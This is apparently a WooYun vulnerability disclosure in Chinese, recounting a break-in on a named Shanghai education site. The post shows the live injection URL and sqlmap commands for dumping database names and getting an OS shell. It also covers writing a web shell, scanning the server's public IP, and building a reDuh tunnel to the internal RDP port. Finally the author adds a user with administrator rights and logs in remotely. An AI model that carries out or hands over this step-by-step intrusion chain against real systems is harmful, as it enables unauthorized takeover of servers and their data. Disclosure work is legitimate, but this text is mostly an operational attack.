WooYun.org

网址：http://shy.hpe.sh.cn
一个sql注入导致的服务器沦陷。
一个事业教育单位，今天就上服务器看看.(声明：未有任何破坏性操作)
没事溜达到这个网址：(注入点)
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169
首先是暴库（16个数据库吧）：
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --dbs

DBA权限：

管理员：

脱裤暴表就没弄了，要这些数据也没啥用。选择了利用这个渗透进服务器。
下面说重点了。os-shell
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --os-shell

比较奇怪sqlmap里执行os-shell不顺手，有点问题，现在就是写个马进去就行了。
果断换了种方式写了个一句话：

之前报错信息已经暴漏了网站的物理地址，马的物理位置：
d:\mainweb\ParentSchool\CN\jxhd\import.aspx
直接上服务器：

至此，已经拥有了这台服务器的shell了。
上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。
到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。
得到的公网IP信息：
Nmap scan report for 210.22.116.91
Host is up (0.011s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
就开了个80端口。
在菜刀里ipconfig下看到的是：
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10
IPv4 地址 . . . . . . . . . . . . : 10.11.124.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.11.124.1
原来是这样的：
公网ip地址:210.22.116.91 这个只开了80端口
内网ip地址:10.11.124.5
要么是防火墙，要么做了端口映射，直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办？
上面的上传的那个getinfo.aspx文件的作用来了。
这里reDuh隧道穿透了：
java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx
给大家弄个截图，大致会出现下面界面：

打开本地1010端口，使用telnet或者nc连接本地的1010端口：

创建隧道：[createTunnel]1234:127.0.0.1:3389
nc本地1010端口，将本地1234端口与远程的服务器端3389端口绑定

ok，基本工作均已完成。下面在用菜刀添加个用户：

密码就不显示了。
提升权限至administrators组
好了，这就全部完成了：
mstsc打开本地127.0.0.1：1234端口，输入刚添加的用户名密码。直接RDP进内网吧：

这样就想操作你自己的电脑一样了，想干什么就干什么。